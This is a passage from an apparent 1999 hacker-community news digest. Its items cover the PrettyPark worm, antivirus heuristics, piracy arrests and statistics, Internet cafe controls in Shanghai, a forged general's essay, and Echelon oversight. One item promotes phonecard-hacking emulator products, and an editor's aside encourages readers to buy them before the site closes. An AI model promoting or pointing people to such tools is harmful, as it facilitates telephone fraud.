Microsoft Windows users who are being sent to a custom
Internet relay chat channel without their knowledge. Once
there, victims’ personal data — ranging from e-mail address
book lists, operating system preferences and registration
numbers, passwords, and form data (including stored credit
card information) — can be potentially retrieved from the
victim’s PC without their knowledge by the virus writer.
PrettyPark is the first known worm with Trojan
capabilities and its very own custom IRC channel.
“This virus took months to write, and its creator put a
great deal of effort into it,” says Steve Trilling of Symantec.
Consumers are being hit harder by the virus because
they are less likely to update their anti-virus software than
large companies or businesses and are more likely to open
and run executables sent by what appears to be family or
friends.
Malicious ‘worm’ spreading in e-mail
The virus is spread when PC users open an attached
e-mail program file named “PrettyPark.EXE”.
When executed, it may display the Windows 3D pipe
screen saver while it creates and sends duplicate files of
itself to e-mail addresses listed in the user’s Internet address
book. PrettyPark will run this routine every 30 seconds,
without the user’s knowledge. It will also connect to the
custom IRC channel while the PC owner is on the Internet
or reading e-mail while connected to a remote server.
So far only Windows-based systems seem to be
vulnerable, the virus is definitely spreading and anti-virus
software manufacturers are expecting to see more victims in
the IRC chat rooms.
In order to protect themselves from PrettyPark and
other viruses, PC users should update their anti-virus
software and avoid opening e-mail attachments.
Researchers are trying to determine if other e-mail
programs, such as Eudora and Lotus Notes, are vulnerable,
presently the Mac and Linux operating systems do not seem
to be affected.
In a related story C|Net takes a look at the technology
behind the Anti-Virus products available today.
C|Net
http://www.news.com/News/Item/0,4,37458,00.html
Battling the unknown virus
By Tim Clark
Staff Writer, CNET News.com
June 7, 1999, 1:35 p.m. PT
Antivirus software makers are recycling some old tricks to combat computer viruses proliferating over the Internet.
The technique, called "heuristics," checks for suspicious commands within software code to detect potential viruses.
Heuristic techniques can detect new viruses never seen before, so they can keep malicious code from spreading. An older
method, called signature-scanning, uses specific pieces of code to identify viruses.
Both methods have down sides. Heuristic techniques can trigger false alarms that flag virus-free code as suspicious.
Signature-scanning requires that a user be infected by a virus before an antivirus researcher can create a patch--and the virus can
spread in the meantime. Most antivirus vendors use both techniques.
"It's time for the industry as a whole to look at different approaches," said Roger Thompson, technical director of malicious code
research at ICSA, a for-profit trade group for computer security vendors. "The time-honored method of signature scanning is a little
worn and weary given new viruses coming out."
Aladdin Knowledge Systems, which just added heuristics-based technology to its line of antivirus technology, claims it can snare
85 percent of the new viruses without many false alarms.
The recent Melissa virus showed that heuristics are not foolproof, as some viruses slip through the antivirus screen and must be
fought with the traditional methods.
Melissa was a macro virus that spread quickly because it self-replicated, sending email from the infected machine to recipients in
that user's address book. Melissa illustrates why macro viruses worry antivirus researchers.
"Melissa was trivial technically and important strategically," said ICSA's Thompson, mainly because it demonstrated the kinds of
disruptions a computer virus can cause, he said.
"Macro viruses are easy to create and easy to modify," said Carey Nachenberg, chief researcher at Symantec's antivirus research
center. To combat viruses like Melissa, heuristics are a must, he said.
Macros are a simple programming language used to build templates in Lotus Notes or Microsoft
Excel. Because of their simplicity, they can be used to create macro viruses, said Chris
Christiansen, security analyst at International Data Corporation.
"There are rumored to be numerous automated applications that automatically generate macro
viruses," said Christiansen, saying they are available on Web sites used by malicious hackers. "An
unsophisticated user could write a macro virus or take a corporate macro and corrupt it, then
replace a legitimate macro."
Today antivirus researchers are closely watching another virus -- the Pretty Park virus, which is
currently circulating in France -- that posts passwords and other identifying data to Internet chat
sites. So far, it's a low level alert because its self-replicating function apparently doesn't work.
Overall, a higher percentage of macro viruses could be caught, said Alladin chief technology officer
Shimon Gruper, at the cost of more false alarms.
"Not everything gets caught, so you still need a rule to catch it," said Susan Orbuch, spokeswoman
for Trend Micro. "When there was a lot of fear about Melissa variants, we quickly put together some
heuristics to combat it."
@HWA
07.0 Eight Arrested in California
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by st1p3r
15,000 mass produced pirated copies of Microsoft
applications where confiscated and eight people where
arrested during a raid in Southern California last
Thursday. They have been indicted on 45 counts of
counterfeiting, conspiracy and money laundering.
Nando Times
http://www.techserver.com/story/body/0,1634,56660-90472-643309-0,00.html
Microsoft program counterfeiters arrested
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
LOS ANGELES (June 5, 1999 5:12 p.m. EDT http://www.nandotimes.com) -
Eight people have been arrested in a counterfeiting scheme that police said churned out
15,000 phony copies of Microsoft computer programs every month. The Southern California
residents were arrested Thursday, a day after being indicted on 45 counts of counterfeiting,
conspiracy and money laundering.
All are expected to enter pleas Monday.
Five other people also were named in the federal grand jury indictment, including three who
were arrested in February and freed on bond, the U.S. attorney's office said Friday.
The ring pressed counterfeit CD-ROM disks of Windows 98 and other popular programs, printed
bogus "certificates of authenticity" and then packaged and sold the disks overseas, authorities
contend.
Authorities in February raided several warehouses and seized a room-sized CD-ROM replicator. Also
seized were color printing presses, packaging machines and other counterfeit items that Microsoft
officials estimated were worth about $56 million on the retail market.
@HWA
08.0 278 Internet Cafes Disciplined
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Public Action Number One, has been launched jointly by
the city of Shanghai China's police force along with
commercial, telecommunications and education
authorities to standardize the city's public Internet
cafes. Only 350 of the cities estimated 2000 internet
cafes are authorized to do business. The crackdown has
resulted in fines and warnings for many establishments
that do not control users forays into cyberspace
Nando Times
http://www.techserver.com/noframes/story/0,2294,56247-89863-639407-0,00.html
Shanghai tightens hold on Internet cafes
Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service
SHANGHAI (June 4, 1999 12:11 p.m. EDT http://www.nandotimes.com) - Chinese boomtown Shanghai has
disciplined 278 unregistered Internet cafes in a crackdown on uncontrolled forays into cyberspace, the
official Liberation Daily reported on Friday.
The move was aimed at "standardizing the city's public Internet cafes" where customers can sip coffee
and surf "the Net," the newspaper said.
A city government official said some of the unregistered cafes would be fined while others would be given
a warning.
The crackdown, described as "Public Action Number One," was launched jointly by the city's police and
commercial, telecommunications and education authorities.
Shanghai now has more than 2,000 Internet cafes but only 1,500 of them have applied to register and only
350 are authorized, the newspaper said.
Local authorities have tightened control of information vendors around the 10th anniversary of the Beijing
crackdown on dissent on June 3-4, 1989, when the army shot its way into Tiananmen Square to end seven weeks
of pro-democracy protests.
Late last month, Shanghai ordered local paging stations and computer information vendors to stop disseminating
political news temporarily, including news downloaded from the Internet.
China has seen explosive growth in the use of the Internet in recent years but the government has also viewed
it as a potential threat to its authority.
There are now an estimated two million Internet users in China and some experts predict the number of Web
surfers could top 10 million by next year.
@HWA
09.0 Forbidden Knowledge Issue #5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Issue Five of the increasingly improving Forbidden
Knowledge e-zine has been released. It features articles
on Memory and Addressing Protection in Multiuser
Operating Systems and some other very interesting
topics. Check it out at the main site or at Packetstorm.
Forbidden Knowledge
http://www.posthuman.za.net
@HWA
10.0 f41th Issue 6
~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by D4RKCYDE
d4rkcyde has kept its work up and released issue 6 of
the H/P ezine f4ith. The zine contains good h/p
technical information and is available almost twice a
month. Back issues are available.
Issue 6
http://darkcyde.system7.org/files/faith/faith6.txt f41th
11.0 Antidote Vol2 Issue 7
~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by lordoak
The newest issue of Antidote has been released with
articles on PC Anywhere, Netscape, and much much
more. Check it out.
Antidote Vol2 Issue 7
http://www.thepoison.org/antidote/issues/vol2/7.txt
12.0 Will the Allies Drop CyberBombs on Milosevic?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by erewhon
A well researched, no FUD, article that goes against the
normal hype and sensationalism. William Larkin backs up
HNNs earlier assessment of last weeks Newsweek
reports of cyber attack against the bank accounts of
Milosevich. A previous unseen transcript of a conference
from the Air Force Association has allowed the
Washington Post to conclude that Yugoslavia's bank
accounts are probably pretty safe. (It is a welcome
change to see good journalism now and again.)
Washington Post
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm
The Good News on Forgery
By William M. Arkin
Special to washingtonpost.com
Monday, June 21, 1999
"The decade begun in Kuwait ends in the skies
over Serbia. No American government will, in
the near future at least, simply assume that it
has the military power needed to impose its will...."
Thus retired Gen. John M. Shalikashvili grumbles about the "difference
between being the greatest ... power in the world and omnipotence" and
warns of the emergence of a "passive" and "isolationist" America as a
result of the war in Yugoslavia.
"The United States will be withdrawing from its aggressive leadership
position not solely because it wishes to," says the former Chairman of the
Joint Chiefs of Staff. "It will be withdrawing because it has seriously lost
the trust of many of its NATO allies."
Why? Besides committing insufficient military power in Yugoslavia, the air
war, he says, is "not going to force a Serbian capitulation."
The Shalikashvili essay, "The World After Kosovo," began circulating via
e-mail about three weeks before Belgrade's withdrawal from Kosovo.
It is a forgery.
"Someone has stolen my name," Shalikashvili told the Seattle
Post-Intelligencer, which revealed the fabrication on the final day of
Operation Allied Force.
Stolen, and Forwarded
"This has been a major embarrassment to me," says a West Point
graduate, after he circulated the Shalikashvili essay to his classmates. Like
many other military observers, he received the commentary via e-mail. "I
innocently passed along the article that had been forwarded to me clearly
marked as being written by Gen. Shali from a network of senior retired
military officers – a normally credible source!"
As compliments and complaints alike poured in from friends and former
aides, General Shalikashvili, who retired in October 1997, discussed with
Defense Department spokesman Ken Bacon whether the electronic
screed should be denounced from the Pentagon podium. They decided
not to bring attention to the fake.
Then Shalikashvili got a call from Deputy
Secretary of State Strobe Talbott, who was
asked by Finnish President Marti Ahtisaari
whether the article might not complicate
negotiations with President Slobodan
Milosevic.
Shalikashvili decided to go public: "I was hoping that it would go away,
but this thing doesn't seem to be dying," he says.
Floss, Dance, Don't be Fooled
I know what you're thinking: The Internet has struck again. Faster than a
speeding bullet an individual's identity has been stolen. An irresponsible
and unregulated medium has perpetrated fraud and deceit.
We've seen this time and again with the Web: Disgraces like Pierre
Salinger's flogging of "intelligence" documents dealing with the TWA Flight
800 accident that turn out to be nothing more than conspiratorial drivel
plucked from the Web. The "Floss, Dance, Don't Be Fooled" MIT
commencement address that wasn't delivered by Kurt Vonnegut. The
Internet does indeed have the capacity to amplify and duplicate what is
real, as well as what is not.
Yet for all the copying and forwarding and
quoting of Shalikashvili's impostor discourse
amongst a cyber-savvy network of retired
generals and veterans who increasingly use
e-mail as a lifeline, what is interesting is that
the comments never really circulated outside
of closed community. A check of Web-wide
discussion group search engines (Deja.com,
AltaVista, Forum One, Remarq) found that
the essay was never sent to a single
newsgroup.
On the Web, there is only a single posting: on
the FreeRepublic site ("The Web's premier conservative news discussion
forum!"). Even here, where the retired military officer who distributed the
essay described it as "the story of the current JCS members who have
been silenced by the White House intimidation machine," the piece was
quickly rejected. The same day it was posted, May 28, three participants
identified the work as fraudulent.
The system works!
A Good Day for Bombing
"The World After Kosovo" is a very good forgery. There is no obvious
inflammatory language; it is a plausible viewpoint that someone could
associate with a retired high-ranking officer.
The news media, like the Web, proved less promiscuous than its popular
reputation in running with the supposed dissent. When Pulitzer
Prize-winning reporter Seymour Hersh received the e-mail from a recently
retired two-star general, he was also warned that it may or may not be
authentic. Hersh read the words with interest, but he says he would never
have done anything with the file, including forwarding it, without contacting
Shalikashvili first.
Tom Ricks, the Pentagon correspondent for the Wall Street Journal, also
received the Shalikashvili piece, in spades. "About 50 military officers
credulously forwarded the 'Shali piece' to me," Ricks says.
Ricks's newspaper made itself famous in January when it quoted from the
e-mail of an Air Force general bragging about the bombing of Iraq. "It's a
good day for bombing," the officer wrote. But after his utterances proved
fair game for the mainstream media, the general, tail fin between his legs,
told the Journal that he probably should have chosen his words better.
E-mail has since proven a nettlesome medium for the closed world of
retired and active duty officers. But before the Internet gets the blame, it
should be made clear that the Shalikashvili episode is an embarrassment
for a network of otherwise worldly military specialists who were fooled by
the prose and perhaps even blinded by their own anti-Clinton animus.
Though many questioned the authenticity of the retired general's words,
they copied and forwarded the essay, Drudge-style. It was hardly a
precision military formation.
William M. Arkin can be reached for comment at
william_arkin@washingtonpost.com
© Copyright 1999 The Washington Post Company
@HWA
13.0 Melissa Suspect Still not Charged
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by Scores
Still free on $100,000 bail, David L. Smith has still not
been officially charged with a crime. He has been
accused of spreading the Melissa virus which rampaged
through the countries computer networks within days of
its release. A spokesperson for the defense claimed that
they are just waiting on the DA.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2271206,00.html
@HWA
14.0 ToorCon '99 Security Expo
~~~~~~~~~~~~~~~~~~~~~~~~~
DATE HAS CHANGED FOR THIS EVENT SEE SECTION 95.0
June 8th 1999
From HNN http://www.hackernews.com/
contributed by h1kari
ToorCon will be held on August 7-8 in San Diego,
California. It is being billed as a computer security
convention hosted by the San Diego 2600 Meeting to
help educate and inform the public on computer security
related matters. ToorCon will feature: Speakers,
Lectures, Hands-on Demonstrations, InstallFests, Root
Contests, and raffles.
HNN Cons Page
http://www.hackernews.com/cons/cons.html
@HWA
15.0 ISS Gets Free Advertising
~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by lamer
Here's a nice 'adverticle' for ISS. ISS must be really
wonderful because they have "tangled" with cDc, that
horrible hacker group that makes Microsoft's life
"miserable". I don't suppose it's possible that MS makes
its own life miserable by putting out 3rd rate software?
Nah. And I don't suppose it is possible that the author
of this article did any research other than contacting
ISS? Nah.
US News
http://www.usnews.com/usnews/issue/990614/14hack.htm
@HWA
16.0 Accounting Firms also get Free Advertising
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by Even lamer
Not to be out done by ISS and the X-Force, Deloitte &
Touche and PriceWaterhouse Coopers get there own
adverticle detailing their joint venture the new
cyber-"fraud squads".
C|Net ISS Gets Free Advertising
http://www.news.com/News/Item/Textonly/0,25,37419,00.html
Accounting firms fight cybercrime
By Dan Goodin
Staff Writer, CNET News.com
June 7, 1999, 4 a.m. PT
URL: http://www.news.com/News/Item/0,4,37419,00.html
The dramatic growth in computer-perpetrated crime has not been lost on big accounting firms, which smell a growing profit center in helping clients protect
themselves against online trespassers.
In the past six months, both Deloitte & Touche and PriceWaterhouse Coopers have formed new cyber-"fraud squads" to investigate crimes and evaluate security
systems. The other big accounting firms, as well as IBM and smaller private investigation outfits, are also jumping into the game.
"We think there are significant unmet needs," said Bill Boni, director of Price Waterhouse's cybercrime investigations group, which was created earlier this year. "It's
certainly going to be an area of interest for all the large accounting firms."
The reason for the interest is simple: Incidents of fraud and other crime perpetrated online are on the rise. Putting a number on the increase is difficult, since many
incidents go unreported. One of the most useful measuring sticks, however, comes from annual reports released by the Computer Security Institute, which surveys
521 security practitioners from corporations, banks, government agencies, and universities.
Last year, 32 percent said they reported serious incidents to law enforcement agencies, nearly twice the number as three years ago. Meanwhile, 55 percent said that
company insiders gained unauthorized access to computer networks, and 30 percent reported intrusions by outsiders. The San Francisco-based group estimates that
computer security breaches cost the respondents more than $123 million last year, and worldwide may cost businesses tens of billions of dollars, according to
Richard Power, the organization's editorial director.
"With the rise of the Internet and the transaction of e-commerce, corporations and government agencies are far more open to attack then ever before," Power told
CNET News.com in an interview. "There are all kinds of new ways to make money through computer crime."
That's where accounting firms come in. For a host of reasons, companies whose online security has been breached frequently prefer to take their problems to private
investigators rather than law enforcement agencies.
"Some [law enforcement agencies] have taken aggressive stances, but even in Silicon Valley you will find that most of the senior officials in police departments are
not that sensitive to high-tech matters," said John O'Laughlin, director of worldwide security at Sun Microsystems. "Most of them are not up to speed in dealing with
high-tech issues."
Companies are also hesitant to go to authorities out of fear the matter will generate negative press. "Some of these companies don't want to admit that they've been
compromised," said assistant U.S. attorney Chris Painter, who investigates high-tech crime. A benefit of taking a crime to private investigators is that companies can
learn all the facts before deciding whether to take the matter to court.
"They keep control of their information," said George Vinson, former head of the FBI's computer intrusion team in San Francisco and now practice leader for
Deloitte & Touche's fraud and forensics team. "So many times [companies] are interested in settling something civilly rather than seeing it splashed on the A-1 page"
of the local newspaper.
The bulk of Vinson's work so far has been investigating claims of copyright infringement. Typically, that means comparing the source code of a client's software
against that of a suspected infringing copy. Vinson also investigates people suspected of using the Internet to manipulate a company's stock price and tracks
employees who misappropriate a company's trade secrets. The accounting firms also assess clients' security systems to make sure they are not vulnerable to attacks.
The work is similar to what Vinson did while at the FBI. In 1996 his group brought down more than 20 Internet users in 10 states who used chat groups to trade
software titles made by companies such as Adobe and Microsoft. And with more and more companies transacting business online, the demand for computer
forensics services is only expected to continue, said Sun's O'Laughlin.
"I don't think there's any question the e-commerce is here to stay," he said. "You're going to see that it's pretty vulnerable to fraud and abuse and [companies] want
to get ahead of the curve."
@HWA
17.0 Analyzer Starts Computer Security Business
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
Analyzer Starts Computer Security Business
contributed by Code Kid
Analyzer (Eric Tenenbaum) is still awaiting the final
outcome in his trial in Israel after he was accused of
breaking into the Pentagon computer systems. While
waiting he has teamed up with three college students
and hopes to raise 4.5 to 5 million dollars to create a
security software package.
Israel Business Globe
http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.2/19990607/1
Tuesday , Jun 8, 1999 Sun-Thu at 18:00 (GMT+2)
Headlines
Exclusive: Analyzer Founds
Computer Security Start-Up
By Ronny Lifschitz
Ehud Tenenbaum, known as the "Analyzer", still
awaiting the commencement of hearings in his
trial, following the exposure of his penetration of
the Pentagon’s computers, is forming a
computer security company. Tenenbaum’s
partners are three students currently completing
their studies in electronic engineering. The new
company is negotiating with potential investors,
and plans to raise $4.5-5 million for the purpose
of developing a security software package, that
will be able to monitor hackers’ activities.
The other partners are Sharon Shani, Gil
Bar-Noy, who was chairman of the students’
negotiating team in the tuition fee battle with the
government, and another student, who prefers to
remain anonymous. At the beginning of 1998,
the three set up Webber Communications, a
company which engaged primarily in the
construction of Internet sites and consultation to
Internet companies.
"Our idea is very innovative, and is based on the
hacker’s point of view", Tenenbaum explains to
"Globes". "Our product will be able to adapt
itself to the hackers’ evolving methods, and
upgrade itself". Tenenbaum refused to give
details of the type of security software the
company is to develop, but said that he and his
partners, who served with the IDF Intelligence
Corps, will set up an intelligence system to
monitor the modus operandi of hackers the
world over, and thus close the gap existing
between security companies and hackers.
The young entrepreneurs believe that many
organisations will purchase their future product,
including NASA and the Pentagon.
See accompanying feature: Analyzer II.
Published by Israel's Business Arena June 7,
1999
@HWA
18.0 $2.9Bil in Piracy in The US
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
$2.9Bil in Piracy in The US
contributed by Sinbad
The Software Information & Industry Association has
released a report that claims that the US is responsible
for $2.9Bil worth of software piracy. The top ten cities
alone represented $1Bil of that money. New York City
was named the worst offending city with a piracy
amount estimated at $259 million. It is kind of
interesting how they come up with these numbers.
Wired
http://www.wired.com/news/news/business/story/20091.html
Software Information & Industry Association
http://www.siia.net/news/releases/piracy/6.8.99-Piracy-Release.htm
Wired;
~~~~~~
Cities Singled Out for Piracy
Wired News Report
4:15 p.m. 8.Jun.99.PDT
Ten major metropolitan areas in the
United States were responsible for more
than US$1 billion in losses to software
piracy in 1998, according to a study
released today by the Software and
Information Industry Association. New
York, Los Angeles, and Chicago topped
the list.
Peter Beruk, vice president of the
association's antipiracy program, said the
cities were singled out because they
feature the highest concentration of
white-collar workers.
The study estimated the losses for the
New York metropolitan area to be $259
million, followed by that of Los Angeles
with $159 million. Chicago was close
behind with more than $112 million in
losses.
Beruk estimates that one in every four
business software applications in use
across the United States is an illegal
copy.
According to the SIIA report, the total
loss throughout the US to software piracy
in 1998 was $2.9 billion, a sizeable chunk
of the $11 billion loss worldwide in 1998.
- - -
Brokers, beware: Online trades grew a
record 47 percent to 500,000 a day in
the first quarter, boosted by a strong
stock market and the increasing appeal of
Internet brokerages, an influential
industry analyst said on Tuesday.
"Online trading firms now appear to be
penetrating the mass markets, not just
the techno-philic early adopters," said
analyst Bill Burnham, of securities firm
Credit Suisse First Boston, in a research
report. Almost 16 percent of all stock
trades now take place in cyberspace, he
added.
"If the fourth quarter of 1998 was a
record quarter for the industry, then the
first quarter of 1999 was quite simply a
complete blowout," Burnham said. Online
trading grew at 34 percent to 340,000 a
day between the third and fourth 1998
quarters.
Online brokers, who two years ago
handled, on average, just 95,500 trades a
day, have been growing at a rapid pace,
thanks in part to heavy advertising.
Investors also keep flocking to Internet
brokers because of low commissions -- an
average $15.75 a trade -- and ease of
use.
The top five US Internet brokers --
Charles Schwab, ETrade Group,
Waterhouse Securities, Datek Online, and
Fidelity Investments -- had a 71.3
percent market share, up from 67.5
percent a year ago, Burnham said.
ETrade and Ameritrade Holding, the No. 6
Internet broker, grew fastest in the first
quarter, each processing at least 60
percent more trades than in the fourth
quarter.
- - -
News Corp. invests in PlanetRx:
PlanetRx.com, an online pharmacy, said
Tuesday that it had raised an additional
$50 million from private investors,
including media company News Corp.
News Corp. -- which owns companies
such as 20th Century Fox, the Fox
television network, and several
newspapers around the world -- said
PlanetRx.com's offerings would fit in with
its plan to combine Fit TV, America's
Health Network, and AHN.com into a new
online health service.
Other investors in this round of financing
included ETrade, Tenet Healthcare,
HealthSouth, and LVMH Group. The sizes
of the individual investments weren't
disclosed.
PlanetRx.com plans to use the funding to
advertise heavily, the company said.
Reuters contributed to this report.
Software Information & Industry Association;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For Immediate Release
Contact:
Peter Beruk, VP, Anti-Piracy Programs, 202-452-1600, ext. 314, or pberuk@siia.net
Keith Kupferschmid, Intellectual Property Counsel, 202-452-1600, ext. 327, or
kkupfer@siia.net
Software & Information Industry Association
Unveils Top Ten “Most Wanted” Metro Areas
For Software Piracy In United States
Cities Responsible For More Than $1 Billion Of Software Piracy Losses In 1998
(June 8, 1999 - Washington, D.C.) - Ten major metropolitan areas in the
United States were responsible for more than $1 billion of losses to software
piracy in 1998, it was revealed today. The announcement was made by SPA,
the anti-piracy division of the Software & Information Industry Association
(SIIA), the largest trade association for the software code and information
content industry. SPA unveiled its list of America’s “most wanted” metropolitan
areas during the release of its 1999 Annual Global Piracy Report. The report
estimates that a total of $2.9 billion was lost to software piracy throughout the
United States during 1998, and that 85 countries were responsible for losses
totaling $11 billion worldwide.
Heading the SPA list was the New York metropolitan area, with an estimated
$259 million of piracy losses in 1998. The Los Angeles metropolitan area was
next with $159 million followed by Chicago with more than $112 million in
losses. Other metropolitan areas on the list (in descending order of losses) were
Washington-Baltimore, Boston-Nashua, San Francisco-Oakland,
Philadelphia-Wilmington, Dallas-Fort Worth, Detroit-Ann Arbor, and Atlanta.
A spokesperson for SPA said that the “Top Ten Most Wanted Metropolitan
Areas” list would be released annually to highlight the seriousness of software
piracy throughout the United States.
“Software piracy is a crime. Our report, issued today, estimates that one in
every four business software applications in use across the United States is an
illegal copy. Knowingly or unknowingly, hundreds of companies are engaged in
criminal activity every day, the moment their employees boot up their
computers. This is unacceptable,” said Ken Wasch, president of SIIA.
“For more than 10 years, SPA has led the fight against software piracy at home
and abroad. By combining enforcement and education, we have been successful
in reducing the rate of piracy in the United States from 48% when we began our
anti-piracy program to an estimated 25% in 1998. But we do not intend to
declare victory until software piracy is eliminated completely.”
“Over the coming weeks, we plan to raise public awareness about the crime -
and consequences - of software piracy. We want all Americans to understand
that, regardless of whether the piracy is committed between friends and
co-workers or by businesses or whether it is committed through illegal rental,
counterfeiting or increasingly via the Internet, it affects more than just the largest
software publishers. Of SIIA’s 1,400 member companies, 60% have annual
revenues of less than $2 million. Software piracy can put those companies - and
their employees - out of business and out of work within a matter of weeks.
Through heightened enforcement and education efforts, we will drive this
message home,” Wasch said.
“Additionally, we will continue to work closely with the Department of Justice
and the FBI in their continuing efforts to eliminate software piracy around the
world. We applaud the recent statement by the Department of Justice that the
FBI is working closely with law enforcement officials in other countries to
combat computer crimes and enhance coordination and improve their combined
capabilities.”
The Software & Information Industry Association (SIIA) is the principal trade
association of the software code and information content industry. SIIA
represents more than 1,400 leading high-tech companies that develop and
market software and electronic content for business, education, consumers and
the Internet. Hundreds of these companies look to SIIA to protect their
intellectual property around the world. Additional information on its anti-piracy
program can be found at www.spa.org/piracy. To report software piracy, call
(800) 388-7478.
SIIA was formed on Jan. 1, 1999, as a result of the merger between the
Software Publishers Association (SPA) and the Information Industry
Association (IIA). Information on SIIA and its wide-range of activities can be
found at www.siia.net.
Copies of the 1999 Global Piracy Report can be found at
www.siia.net/news/releases/piracy/98globalpiracy.htm or by
contacting David Phelps at 202-452-1600, ext. 320
The 1999 SPA “Ten Most Wanted Metropolitan Areas” List
(based on revenue losses due to software piracy in 1998)
1. New York-Northern NJ-Long Island - - $259,804,592
2. Los Angeles-Anaheim-Riverside - - $159,572,768
3. Chicago-Gary-Kenosha - - $112,201,219
4. Washington-Baltimore - - $86,752,957
5. Boston-Nashua - - $80,740,945
6. San Francisco-Oakland - - $79,993,397
7. Philadelphia-Wilmington - - $59,829,725
8. Dallas-Fort Worth - - $62,080,995
9. Detroit-Ann Arbor-Flint - - $61,379,449
10. Atlanta - - $50,479,623
@HWA
19.0 Congress and NSA tangle over Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
Congress and NSA tangle over Echelon
contributed by oolong
The US Congress and the NSA seem to be butting heads
over ECHELON. While all this sounds altruistic, you can
bet that it's the beginning of a high level power struggle
over who controls the information.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0531/web-nsa-6-3-99.html
JUNE 3, 1999 . . . 18:34 EDT
Congress, NSA butt heads over Echelon
BY DANIEL VERTON (dan_verton@fcw.com)
Congress has squared off with the National Security Agency over a
top-secret U.S. global electronic surveillance program, requesting top
intelligence officials to report on the legal standards used to prevent privacy
abuses against U.S. citizens.
According to an amendment to the fiscal 2000 Intelligence Authorization Act
proposed last month by Rep. Bob Barr (R-Ga.), the director of Central
Intelligence, the director of NSA and the attorney general must submit a
report within 60 days of the bill becoming law that outlines the legal standards
being employed to safeguard the privacy of American citizens against Project
Echelon.
Echelon is NSA's Cold War-vintage global spying system, which consists of a
worldwide network of clandestine listening posts capable of intercepting
electronic communications such as e-mail, telephone conversations, faxes,
satellite transmissions, microwave links and fiber-optic communications traffic.
However, the European Union last year raised concerns that the system may
be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17,
1998].
However, NSA, the supersecret spy agency known best for its worldwide
eavesdropping capabilities, for the first time in the history of the House
Permanent Select Committee on Intelligence refused to hand over documents
on the Echelon program, claiming attorney/client privilege.
Congress is "concerned about the privacy rights of American citizens and
whether or not there are constitutional safeguards being circumvented by the
manner in which the intelligence agencies are intercepting and/or receiving
international communications...from foreign nations that would otherwise be
prohibited by...the limitations on the collection of domestic intelligence," Barr
said. "This very straightforward amendment...will help guarantee the privacy
rights of American citizens [and] will protect the oversight responsibilities of
the Congress which are now under assault" by the intelligence community.
Calling NSA's argument of attorney/client privilege "unpersuasive and
dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of
the intelligence community to deny access to documents on intelligence
programs could "seriously hobble the legislative oversight process" provided
for by the Constitution and would "result in the envelopment of the executive
branch in a cloak of secrecy."
@HWA
20.0 Emutronix Phone Hacking Products releases new Mach emulator
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
Emutronix Revs Mach
contributed by Fr3akm4n
Emutronix Phonecard Hacking Products have released
their latest version of the Mach Emulation Software.
Version 2.1 incorporates an easier working panel and is
much more user friendly.
Emutronix
http://fly.to/mach3
(I'd check this site out b4 it gets closed down cards start at $350 with a
one year guarentee for any country except France... - Ed )
21.0 Is That Spelled With a "PH" or an "F"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
contributed by smith
The Concise Oxford Dictionary has added some new
words to its vernacular. One notable inclusion is the
word "Phreaking" with a definition of hacking into the
telephone network. Other new words include firewall and
portal among others.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2272766,00.html
The Concise Oxford Dictionary
http://www.oed.com
@HWA
22.0 The Demonizing of the Hacker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Are years in jail the correct answer for teenage script
kiddies who deface web pages? Are dangerous
precedents being created today that will limit personal
freedom tomorrow? Are we running the risk of turning
criminals into cultural icons? Peter Wayner takes a look
at these complex questions.
Salon
http://www.salonmagazine.com/tech/feature/1999/06/09/hacker_penalties/index.html
Should hackers spend years in prison?
Stiff penalties for computer trespassing could create a broad new
class of criminal -- including you and me.
- - - - - - - - - - - -
BY PETER WAYNER
June 9, 1999 | The FBI recently declared war on those
pesky hackers -- again. The news is filled with the
story of some group known as Global Hell that is
breaking into Web sites and causing mayhem. The
FBI is cracking down, confiscating computers and
taking names; and some hackers are actually fighting
back and shutting down some government Web sites.
The press loves hackers because computer crime is
something new. (I'm using "hackers" the way the
media does, to describe those who get their kicks
breaking into computer systems, rather than the older
usage describing those who delight in difficult software
coding work.) Murder, rape, drug dealing, theft and
fraud continue as always, with ups and downs in their
rates -- but teenagers breaking into Web sites is
something no one has seen before.
The problem with the war against hackers is that most
of what the hackers are supposedly doing would be
trivial if it weren't happening on the Internet. The
typical hacker attack on a Web site isn't much
different from scrawling graffitti on the outside of a
building. Many attackers are just poking around -- like
